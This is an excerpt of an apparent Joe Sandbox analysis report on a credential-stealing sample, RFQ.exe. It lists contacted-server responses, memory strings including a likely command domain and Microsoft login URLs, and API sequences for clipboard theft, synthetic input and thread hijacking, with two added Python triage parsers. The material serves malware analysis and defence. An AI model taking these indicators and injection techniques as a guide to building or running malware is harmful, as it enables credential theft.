                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 07 Nov 2024 16:59:01 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a 
padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 07 Nov 2024 16:59:04 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a 
padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 16:59:19 GMTServer: Apache/2.4.25 (Debian)Content-Length: 278Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 35 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 65 76 6f 6f 2e 77 65 62 73 69 74 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.25 (Debian) Server at www.evoo.website Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 17:00:08 GMTServer: ApacheVary: Accept-EncodingContent-Encoding: gzipContent-Length: 179Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e bb 0e 82 40 10 45 7b be 62 a4 97 41 43 63 32 d9 42 1e 91 04 91 98 a5 b0 44 77 cc 92 20 20 2c 1a fd 7a 79 34 96 77 ee 99 93 4b ab e0 e4 cb 4b 16 c2 41 1e 13 c8 f2 7d 12 fb 60 af 11 e3 50 46 88 81 0c 96 66 eb b8 88 61 6a 0b 8b b4 79 54 82 34 17 6a 0c a6 34 15 0b cf f5 20 6d 0c 44 cd 50 2b c2 e5 68 11 ce 10 5d 1b f5 99 fe 36 e2 8f 19 93 45 ad 90 9a a1 e3 e7 c0 bd 61 05 f9 39 01 dc f1 f7 86 f0 2e 7a a8 47 fc 3e e1 d0 d4 60 74 d9 43 cf dd 8b 3b 87 b0 9d f4 b3 78 54 4d 83 ac 1f e7 d4 aa 36 cb 00 00 00 Data Ascii: M@E{bACc2BDw ,zy4wKKA}`PFfajyT4j4 mDP+h]6Ea9.zG>`tC;xTM6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 17:00:10 GMTServer: ApacheVary: Accept-EncodingContent-Encoding: gzipContent-Length: 179Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e bb 0e 82 40 10 45 7b be 62 a4 97 41 43 63 32 d9 42 1e 91 04 91 98 a5 b0 44 77 cc 92 20 20 2c 1a fd 7a 79 34 96 77 ee 99 93 4b ab e0 e4 cb 4b 16 c2 41 1e 13 c8 f2 7d 12 fb 60 af 11 e3 50 46 88 81 0c 96 66 eb b8 88 61 6a 0b 8b b4 79 54 82 34 17 6a 0c a6 34 15 0b cf f5 20 6d 0c 44 cd 50 2b c2 e5 68 11 ce 10 5d 1b f5 99 fe 36 e2 8f 19 93 45 ad 90 9a a1 e3 e7 c0 bd 61 05 f9 39 01 dc f1 f7 86 f0 2e 7a a8 47 fc 3e e1 d0 d4 60 74 d9 43 cf dd 8b 3b 87 b0 9d f4 b3 78 54 4d 83 ac 1f e7 d4 aa 36 cb 00 00 00 Data Ascii: M@E{bACc2BDw ,zy4wKKA}`PFfajyT4j4 mDP+h]6Ea9.zG>`tC;xTM6
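The responses above come from several unrelated web servers (LiteSpeed, Apache, nginx, an Apache/2.4.25 host) within about a minute and a half, all answering 404, with bodies printed as hex, some chunked and gzip-compressed, and the longer dumps cut off part-way. That is the shape of a stealer walking a hard-coded list of decoy and command-and-control domains, and sorting the real one out starts with decoding the bodies and lining up the timestamps. The following Python is an added example, not part of the Joe Sandbox report or of Joe Sandbox's tooling: it parses records in the printed form shown above (headers run together, "Data Raw:" hex dump), dechunks and gunzips as the headers say, recovers what it can from a truncated dump, and lists the seconds between consecutive responses. The KNOWN_HEADERS list is an assumption drawn from this report; the SAMPLE_RECORDS are constructed, with the Server values and Date stamps of the entries above but short stand-in bodies so the example runs offline.

```python
"""Decode 'HTTP traffic detected' response records in the form a Joe Sandbox report
prints them.  Added example, not part of this report or of Joe Sandbox.  SAMPLE_RECORDS
are constructed: printed shape, Server values and Date stamps follow this report's
entries; the bodies are short stand-ins re-chunked / re-gzipped here to run offline."""
import gzip
import re
import zlib
from email.utils import parsedate_to_datetime

# The printed form runs headers together with no separator, so the split relies on
# known header names; this list (an assumption) covers the names in this report.
KNOWN_HEADERS = ("keep-alive", "content-type", "transfer-encoding", "content-encoding",
                 "content-length", "vary", "date", "server", "x-turbo-charged-by", "connection")
HEADER_SPLIT = re.compile(r"(?=(?:" + "|".join(map(re.escape, KNOWN_HEADERS)) + r"):\s)", re.I)

def parse_record(line):
    """One printed record -> dict(status, headers (lower-cased names), raw body bytes)."""
    head, _, tail = line.split("HTTP traffic detected:", 1)[1].partition("Data Raw:")
    hexdump = tail.split("Data Ascii:", 1)[0]                # drop the ASCII rendering
    parts = [p.strip() for p in HEADER_SPLIT.split(head.strip()) if p.strip()]
    headers = {}
    for part in parts[1:]:                                    # parts[0] is the status line
        name, _, value = part.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"status": int(parts[0].split()[1]), "headers": headers,
            "raw": bytes.fromhex(hexdump)}

def dechunk(data):
    """Undo chunked transfer-encoding -> (body, complete).  A dump cut off inside a
    chunk (the report truncates long bodies) yields the bytes that were present."""
    out, pos = bytearray(), 0
    while True:
        end = data.find(b"\r\n", pos)
        if end < 0:
            return bytes(out), False
        try:
            size = int(data[pos:end].split(b";")[0].strip(), 16)   # ignore chunk extensions
        except ValueError:
            return bytes(out), False
        if size == 0:
            return bytes(out), True                                # terminating chunk
        chunk = data[end + 2:end + 2 + size]
        out += chunk
        if len(chunk) < size:
            return bytes(out), False                               # dump ended mid-chunk
        pos = end + 2 + size + 2                                   # skip the chunk's CRLF

def decode_body(rec):
    """Apply Content-Length / chunked / gzip as the headers say -> (body, complete).
    A truncated gzip stream is inflated as far as it goes rather than discarded."""
    h, data, complete = rec["headers"], rec["raw"], True
    if "content-length" in h:
        complete = len(data) == int(h["content-length"])
    if h.get("transfer-encoding", "").lower() == "chunked":
        data, complete = dechunk(data)
    if h.get("content-encoding", "").lower() == "gzip":
        inflater = zlib.decompressobj(16 + zlib.MAX_WBITS)         # 16: expect a gzip wrapper
        data = inflater.decompress(data)
        complete = complete and inflater.eof
    return data, complete

def summarize(lines):
    """One row per response in report order: when, which server software, what came back."""
    rows = []
    for line in lines:
        rec = parse_record(line)
        body, complete = decode_body(rec)
        title = re.search(rb"<title>(.*?)</title>", body)
        rows.append({"date": rec["headers"].get("date", ""), "server": rec["headers"].get("server", "?"),
                     "status": rec["status"], "body_len": len(body), "complete": complete,
                     "title": title.group(1).decode("latin-1") if title else ""})
    return rows

def beacon_intervals(rows):
    """Seconds between consecutive responses by Date header: a steady cadence across
    unrelated hosts is what a walk through a hard-coded domain list looks like."""
    times = sorted(parsedate_to_datetime(r["date"]) for r in rows)
    return [int((b - a).total_seconds()) for a, b in zip(times, times[1:])]

LITESPEED_HTML = (b"<!DOCTYPE html>\n<html>\n    <head>\n    <title>404 Not Found</title>\n"
                  b"    </head>\n    <body><h1>404 Not Found</h1></body>\n</html>\n")
APACHE_HTML = (b'<!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<html><head>\n<title>404 Not'
               b" Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL was not"
               b" found on this server.</p>\n</body></html>\n")

def _record(headers, body):                                       # the report's printed form
    return ("Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found"
            + "".join(f"{k}: {v}" for k, v in headers) + "Data Raw: " + body.hex(" "))

_GZ = gzip.compress(LITESPEED_HTML)
_CHUNKED_GZ = f"{len(_GZ):X}\r\n".encode() + _GZ + b"\r\n0\r\n\r\n"    # one chunk + terminator
SAMPLE_RECORDS = [
    _record([("keep-alive", "timeout=5, max=100"), ("content-type", "text/html"),
             ("transfer-encoding", "chunked"), ("content-encoding", "gzip"),
             ("date", "Thu, 07 Nov 2024 16:58:33 GMT"), ("server", "LiteSpeed"),
             ("connection", "close")], _CHUNKED_GZ),
    # same shape, but the dump stops three quarters in, as the report does for long bodies
    _record([("content-type", "text/html"), ("transfer-encoding", "chunked"), ("content-encoding", "gzip"),
             ("date", "Thu, 07 Nov 2024 16:58:36 GMT"), ("server", "LiteSpeed")],
            _CHUNKED_GZ[:3 * len(_CHUNKED_GZ) // 4]),
    _record([("Date", "Thu, 07 Nov 2024 16:58:42 GMT"), ("Server", "Apache"), ("Connection", "close"),
             ("Content-Length", str(len(APACHE_HTML))), ("Content-Type", "text/html")], APACHE_HTML),
]
```

To run it over the report's own entries, paste each "HTTP traffic detected" line into a list and call summarize() on it; a record whose dump the report truncated comes back with complete=False and whatever bytes could be recovered, which for the gzip cases is usually enough to read the page title and tell one hosting stack's 404 page from another.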
                Source: net.exe, 0000000B.00000002.3130867153.000000000477A000.00000004.10000000.00040000.00000000.sdmp, rNgGAKxrFRkFYx.exe, 0000000C.00000002.3129106361.000000000307A000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer
                Source: rNgGAKxrFRkFYx.exe, 0000000C.00000002.3131106553.0000000004C73000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.wukong.college
                Source: rNgGAKxrFRkFYx.exe, 0000000C.00000002.3131106553.0000000004C73000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.wukong.college/9ezc/
                Source: net.exe, 0000000B.00000003.1694957428.000000000812D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: net.exe, 0000000B.00000003.1694957428.000000000812D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: net.exe, 0000000B.00000003.1694957428.000000000812D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: net.exe, 0000000B.00000003.1694957428.000000000812D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: net.exe, 0000000B.00000003.1694957428.000000000812D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: net.exe, 0000000B.00000003.1694957428.000000000812D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: net.exe, 0000000B.00000003.1694957428.000000000812D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: net.exe, 0000000B.00000002.3124155350.000000000331D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: net.exe, 0000000B.00000002.3124155350.000000000331D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: net.exe, 0000000B.00000002.3124155350.000000000331D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: net.exe, 0000000B.00000002.3124155350.000000000331D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: net.exe, 0000000B.00000002.3124155350.000000000331D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: net.exe, 0000000B.00000002.3124155350.000000000331D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: net.exe, 0000000B.00000003.1690779920.0000000008103000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: net.exe, 0000000B.00000002.3130867153.0000000004456000.00000004.10000000.00040000.00000000.sdmp, rNgGAKxrFRkFYx.exe, 0000000C.00000002.3129106361.0000000002D56000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://whois.gandi.net/en/results?search=4nk.education
                Source: net.exe, 0000000B.00000002.3130867153.0000000004DC2000.00000004.10000000.00040000.00000000.sdmp, net.exe, 0000000B.00000002.3132876926.0000000006660000.00000004.00000800.00020000.00000000.sdmp, rNgGAKxrFRkFYx.exe, 0000000C.00000002.3129106361.00000000036C2000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://whois.gandi.net/en/results?search=astorg-group.info
                Source: net.exe, 0000000B.00000003.1694957428.000000000812D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
                Source: net.exe, 0000000B.00000002.3130867153.0000000004DC2000.00000004.10000000.00040000.00000000.sdmp, net.exe, 0000000B.00000002.3132876926.0000000006660000.00000004.00000800.00020000.00000000.sdmp, net.exe, 0000000B.00000002.3130867153.0000000004456000.00000004.10000000.00040000.00000000.sdmp, rNgGAKxrFRkFYx.exe, 0000000C.00000002.3129106361.0000000002D56000.00000004.00000001.00040000.00000000.sdmp, rNgGAKxrFRkFYx.exe, 0000000C.00000002.3129106361.00000000036C2000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.gandi.net/en/domain
                Source: net.exe, 0000000B.00000002.3130867153.00000000045E8000.00000004.10000000.00040000.00000000.sdmp, rNgGAKxrFRkFYx.exe, 0000000C.00000002.3129106361.0000000002EE8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.google.com
                Source: net.exe, 0000000B.00000003.1694957428.000000000812D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: C:\Users\user\Desktop\RFQ.exe Code function: 1_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,1_2_0045A10F
                Source: C:\Users\user\Desktop\RFQ.exe Code function: 1_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,1_2_0046DC80
                Source: C:\Users\user\Desktop\RFQ.exe Code function: 1_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,1_2_0044C37A
                Source: C:\Users\user\Desktop\RFQ.exe Code function: 1_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,1_2_0047C81C
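The code-function records in this report (the clipboard and keyboard ones above for RFQ.exe, and the NtXxx ones listed for C:\Windows\SysWOW64\svchost.exe under System Summary) share one printed shape: the process, a function id of the form pid_run_address, the API names that function calls, and the id again. The following Python is an added example, not part of the Joe Sandbox report or of its signature engine: it parses that shape and applies a few rules of this example's own (assumptions, not Joe Sandbox's logic) to answer the questions a triage analyst asks of such a list: which single function reads or writes the clipboard or synthesises input, whether one process holds the allocate/suspend/set-context trio that thread hijacking needs, and from which memory regions the native API calls are made, so that svchost.exe's NtXxx wrappers at 0x0367xxxx can be set against the 0x00400000 image that the Yara matches name. The SAMPLE_LINES are copied from this report; the rule labels, the API sets behind them and the 1 MiB region granularity are this example's choices.

```python
"""Triage the 'Code function:' records of a Joe Sandbox report: which API combinations
each listed function uses, what each process has in total, and from which memory
regions the native (NtXxx) calls are made.  Added example, not part of this report
or of Joe Sandbox.  SAMPLE_LINES are copied from this report; the rules and the
1 MiB region split are this example's own assumptions, not Joe Sandbox signatures."""
import re
from collections import defaultdict

# Printed shape: "Source: <process>Code function: <fid> <api>,<api>,...,<fid>" with
# fid = <pid>_<run>_<hex address>; the process path runs straight into "Code function".
RECORD_RE = re.compile(
    r"Source:\s*(?P<proc>.+?)\s*Code function:\s*"
    r"(?P<fid>[0-9A-Fa-f]+_\d+_(?P<addr>[0-9A-Fa-f]+))\s+(?P<apis>.*?),?\s*(?P=fid)\s*$")

def parse_code_function(line):
    """One record -> dict(process, fid, addr, apis); None if the line is not one."""
    m = RECORD_RE.search(line)
    if not m:
        return None
    return {"process": m.group("proc"), "fid": m.group("fid"),
            "addr": int(m.group("addr"), 16),
            "apis": [a.strip() for a in m.group("apis").split(",") if a.strip()]}

# Per-function rules (assumption): every named API must occur in the same function.
FUNCTION_RULES = [
    ("clipboard read", {"OpenClipboard", "GetClipboardData"}),
    ("clipboard write", {"OpenClipboard", "SetClipboardData"}),
    ("synthetic keyboard input", {"SendInput"}),
    ("thread context rewrite", {"NtSetContextThread"}),
]
# Per-process rules (assumption): the APIs may be spread over several functions.
PROCESS_RULES = [
    ("thread-hijack building blocks (allocate, suspend, set context)",
     {"NtAllocateVirtualMemory", "NtSuspendThread", "NtSetContextThread"}),
    ("clipboard read and write", {"GetClipboardData", "SetClipboardData"}),
]

def tag_function(rec):
    apis = set(rec["apis"])
    return [label for label, needed in FUNCTION_RULES if needed <= apis]

def tag_processes(records):
    by_proc = defaultdict(set)
    for r in records:
        by_proc[r["process"]].update(r["apis"])
    return {p: [label for label, needed in PROCESS_RULES if needed <= apis]
            for p, apis in by_proc.items()}

def native_calls_by_region(records, shift=20):
    """NtXxx/ZwXxx names per (process, 1 MiB region of the calling function).  Native
    calls made from a region other than the process image are the first thing to
    look at: that mapping is either ntdll itself or a private copy of its stubs."""
    out = defaultdict(set)
    for r in records:
        region = (r["addr"] >> shift) << shift
        out[(r["process"], f"0x{region:08X}")].update(
            a for a in r["apis"] if a.startswith(("Nt", "Zw")))
    return {key: sorted(names) for key, names in out.items() if names}

def triage(lines):
    """Everything above in one pass over the report's lines."""
    records = [r for r in map(parse_code_function, lines) if r]
    return {"functions": {r["fid"]: tag_function(r) for r in records},
            "processes": tag_processes(records),
            "native_by_region": native_calls_by_region(records)}

# Copied from this report (leading whitespace dropped); raw strings keep the backslashes.
SAMPLE_LINES = [
    r"Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,1_2_0045A10F",
    r"Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,1_2_0046DC80",
    r"Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,1_2_0044C37A",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0042CA43 NtClose,7_2_0042CA43",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03672B60 NtClose,LdrInitializeThunk,7_2_03672B60",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03674340 NtSetContextThread,7_2_03674340",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03674650 NtSuspendThread,7_2_03674650",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03672BF0 NtAllocateVirtualMemory,7_2_03672BF0",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03672AF0 NtWriteFile,7_2_03672AF0",
]
```

On these lines triage() tags 1_2_0045A10F as a clipboard write, 1_2_0046DC80 as a clipboard read and 1_2_0044C37A as synthetic keyboard input, credits svchost.exe with the allocate/suspend/set-context trio, and shows its native calls split between the 0x00400000 region (NtClose) and the 0x03600000 region (everything else); the rules are deliberately narrow, so extend FUNCTION_RULES and PROCESS_RULES rather than loosening them.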

                E-Banking Fraud

                Source: Yara match File source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0000000B.00000002.3128924724.00000000034F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000007.00000002.1512156269.0000000009040000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000C.00000002.3131106553.0000000004C10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000007.00000002.1506663824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000B.00000002.3129083519.0000000003650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000007.00000002.1507308924.00000000061A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000B.00000002.3121215291.00000000030A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000009.00000002.3129016508.0000000005600000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

Source: initial sample | Static PE information: Filename: RFQ.exe
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0042CA43 NtClose
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03672B60 NtClose,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03672DF0 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_036735C0 NtCreateMutant,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03674340 NtSetContextThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03674650 NtSuspendThread
